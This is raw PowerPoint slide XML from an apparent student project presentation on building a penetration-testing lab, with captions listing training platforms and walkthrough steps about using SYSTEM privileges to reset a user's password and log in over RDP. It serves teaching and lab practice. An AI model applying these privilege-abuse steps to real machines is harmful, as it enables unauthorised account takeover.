      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE899BD0-B40F-4416-9478-E33B481959DA}" type="pres">
      <dgm:prSet presAssocID="{F36D03AC-2EE8-4904-A1F8-A08EF5312900}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0CDA796E-9B97-4106-9A12-46F6A1A71410}" type="pres">
      <dgm:prSet presAssocID="{06EEACC6-15E9-4ADF-BA87-133C14056FD2}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{248BC9F7-25B3-4B00-9717-CD228AE9496F}" type="pres">
      <dgm:prSet presAssocID="{06EEACC6-15E9-4ADF-BA87-133C14056FD2}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2851642C-A324-4B79-B59A-EB213AFFA8F3}" type="presOf" srcId="{BC0509EB-DCFC-4E9E-A474-917A3E16C8D1}" destId="{675F7414-9D29-4628-AFD0-10C3384AA99E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{65409C5A-A023-4C9A-BCF9-3BE978780A8B}" srcId="{8F27F5C3-7F9B-4E32-B04D-CA09B0BEA772}" destId="{BC0509EB-DCFC-4E9E-A474-917A3E16C8D1}" srcOrd="1" destOrd="0" parTransId="{EB793469-9A22-47FD-A6D8-C7B91845FD9A}" sibTransId="{0B7EEC07-E9CE-46DE-A54A-D68AF4CABE22}"/>
    <dgm:cxn modelId="{EE00BE87-3C33-4FBE-B4AA-1E84ABAEF6AB}" srcId="{8F27F5C3-7F9B-4E32-B04D-CA09B0BEA772}" destId="{06EEACC6-15E9-4ADF-BA87-133C14056FD2}" srcOrd="0" destOrd="0" parTransId="{5EB32B3B-2DBB-480D-8F4F-02F6D3D0C5FD}" sibTransId="{F36D03AC-2EE8-4904-A1F8-A08EF5312900}"/>
    <dgm:cxn modelId="{1DED93A2-9BB0-4658-947D-73807676199D}" type="presOf" srcId="{8F27F5C3-7F9B-4E32-B04D-CA09B0BEA772}" destId="{C45289CB-7423-4C63-97C3-789B1ACCC19A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{55BAD4A8-A59C-4834-B4D1-591F96D45F73}" type="presOf" srcId="{06EEACC6-15E9-4ADF-BA87-133C14056FD2}" destId="{248BC9F7-25B3-4B00-9717-CD228AE9496F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{E81796AF-6BE1-4B02-9533-15889987C39F}" type="presParOf" srcId="{C45289CB-7423-4C63-97C3-789B1ACCC19A}" destId="{EC1A08E0-4375-4707-83B6-ADE80E79C441}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{7413A7F4-9B00-4497-9360-7325E86C2DCF}" type="presParOf" srcId="{EC1A08E0-4375-4707-83B6-ADE80E79C441}" destId="{675F7414-9D29-4628-AFD0-10C3384AA99E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{4CA4ABDE-2AD3-4850-BEBF-22A29D7E1BC7}" type="presParOf" srcId="{C45289CB-7423-4C63-97C3-789B1ACCC19A}" destId="{EE899BD0-B40F-4416-9478-E33B481959DA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{0142CD17-DD67-437C-9A1D-FD4FFF430902}" type="presParOf" srcId="{C45289CB-7423-4C63-97C3-789B1ACCC19A}" destId="{0CDA796E-9B97-4106-9A12-46F6A1A71410}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{5EB81B32-90FD-45E3-81D9-1520523C5B9E}" type="presParOf" srcId="{0CDA796E-9B97-4106-9A12-46F6A1A71410}" destId="{248BC9F7-25B3-4B00-9717-CD228AE9496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48305-AE45-4840-917A-014089866373}">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i="1" kern="1200"/>
            <a:t>Business issue, market analysis, solution etc.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="789384" y="2249"/>
        <a:ext cx="2602259" cy="1561355"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2ED94156-C028-4809-B479-276DB9947729}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3651870" y="2249"/>
          <a:ext cx="2602259" cy="1561355"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-135193"/>
            <a:satOff val="-3619"/>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Some examples of products similar are:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3651870" y="2249"/>
        <a:ext cx="2602259" cy="1561355"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4A42044F-BE2F-4DBF-A3A0-694AE603C524}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6514355" y="2249"/>
          <a:ext cx="2602259" cy="1561355"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-270386"/>
            <a:satOff val="-7238"/>
            <a:lumOff val="-25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TryHackme</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6514355" y="2249"/>
        <a:ext cx="2602259" cy="1561355"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A66A276E-BD6C-4893-B21D-CAE9BACC708D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="789384" y="1823830"/>
          <a:ext cx="2602259" cy="1561355"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-405579"/>
            <a:satOff val="-10857"/>
            <a:lumOff val="-376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HackTheBox</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="789384" y="1823830"/>
        <a:ext cx="2602259" cy="1561355"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{249E1BB4-79F5-40C9-8058-615D61502EF2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3651870" y="1823830"/>
          <a:ext cx="2602259" cy="1561355"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-540772"/>
            <a:satOff val="-14476"/>
            <a:lumOff val="-50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Virtual Hacking Labs</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3651870" y="1823830"/>
        <a:ext cx="2602259" cy="1561355"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{49C5A224-6654-4451-AAAC-C8424F6245AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6514355"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Offensive Security (OSCP Labs)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6514355" y="1823830"/>
        <a:ext cx="2602259" cy="1561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F7414-9D29-4628-AFD0-10C3384AA99E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="873855"/>
          <a:ext cx="9905998" cy="573344"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">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bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Since we already have the privileged account NT authority/system we can change the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" kern="1200"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sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> password using  the below command.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:lumOff val="5000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="873855"/>
        <a:ext cx="9905998" cy="573344"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{248BC9F7-25B3-4B00-9717-CD228AE9496F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="652"/>
          <a:ext cx="9905998" cy="881803"/>
        </a:xfrm>
        <a:prstGeom prst="upArrowCallout">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">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bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Since there is a username associated with Peter, we need to access the target machine using the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" kern="1200"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sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> account. To do this, we must reset the password for </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" kern="1200"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sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> and then attempt to connect to the target machine via RDP using the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" kern="1200" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>adminpeter</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> credentials.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:lumOff val="5000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="0" y="652"/>
        <a:ext cx="9905998" cy="5729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4:19:45.635"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24516,'0'852'0,"2076"-852"0,-2076-852 0,-2076 852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06:22:10.712"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24517,'0'654'0,"2390"-654"0,-2390-654 0,-2390 654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457E8-4ABE-4A65-BE72-016FBA742A6C}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>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DBBA7-7FBE-452B-AEA5-5C9A6C78B447}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38917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DBBA7-7FBE-452B-AEA5-5C9A6C78B447}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286388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FA56E-FD96-4335-BBCD-43E4123A570A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291914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46D583-D93E-4511-8E30-F02B7CC95D72}"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2694925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BC245C-43D0-4856-B0D9-9581BF1138CD}"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EAF52-4C55-4DF6-AB8B-721B2AF3E89B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1816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C245C-43D0-4856-B0D9-9581BF1138C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EAF52-4C55-4DF6-AB8B-721B2AF3E89B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3870949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5BC245C-43D0-4856-B0D9-9581BF1138C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EAF52-4C55-4DF6-AB8B-721B2AF3E89B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3505256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5BC245C-43D0-4856-B0D9-9581BF1138C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EAF52-4C55-4DF6-AB8B-721B2AF3E89B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="484278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C245C-43D0-4856-B0D9-9581BF1138C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EAF52-4C55-4DF6-AB8B-721B2AF3E89B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3842511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C245C-43D0-4856-B0D9-9581BF1138C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EAF52-4C55-4DF6-AB8B-721B2AF3E89B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2270139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46D583-D93E-4511-8E30-F02B7CC95D72}"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3444070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46D583-D93E-4511-8E30-F02B7CC95D72}"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4196991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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="886885" y="1497014"/>
            <a:ext cx="10375900" cy="158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7" descr="logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="72476"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10856385" y="461963"/>
            <a:ext cx="459316"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87480" y="893357"/>
            <a:ext cx="10375357" cy="604593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" baseline="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886887"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3845984" y="6246814"/>
            <a:ext cx="3860800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8417984" y="6246814"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9C9D09EA-B44B-4558-A788-66AB2380098A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391743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46D583-D93E-4511-8E30-F02B7CC95D72}"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15175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46D583-D93E-4511-8E30-F02B7CC95D72}"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264394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46D583-D93E-4511-8E30-F02B7CC95D72}"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68192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46D583-D93E-4511-8E30-F02B7CC95D72}"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9841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46D583-D93E-4511-8E30-F02B7CC95D72}"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297448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6D583-D93E-4511-8E30-F02B7CC95D72}"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303020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46D583-D93E-4511-8E30-F02B7CC95D72}"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203575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846D583-D93E-4511-8E30-F02B7CC95D72}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/14/2025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C287CF67-175C-4EFF-9CA5-99DE883DA58B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1920578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5BC245C-43D0-4856-B0D9-9581BF1138CD}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/14/2025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A4EAF52-4C55-4DF6-AB8B-721B2AF3E89B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339417600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4f656d1586a34d4b" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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gtfobins.github.io/gtfobin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Layout" Target="../diagrams/layout2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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74.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle2.xml"/><Relationship Id="rId9"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09801" y="1981201"/>
            <a:ext cx="7781925" cy="1458913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1"/>
              <a:t>C300 Final Evaluation </a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4191000"/>
            <a:ext cx="304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SG" altLang="en-US" sz="1800" b="1"/>
              <a:t>Project ID:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SOI-2024-2420-0022</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" altLang="en-US" sz="1800" b="1"/>
              <a:t>Project Title:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Building a Penetration testing laboratory</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3962400"/>
            <a:ext cx="3124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SG" altLang="en-US" sz="1800" b="1"/>
              <a:t>Team ID:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SOI-2024-0047</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" altLang="en-US" sz="1800" b="1"/>
          </a:p>
          <a:p>
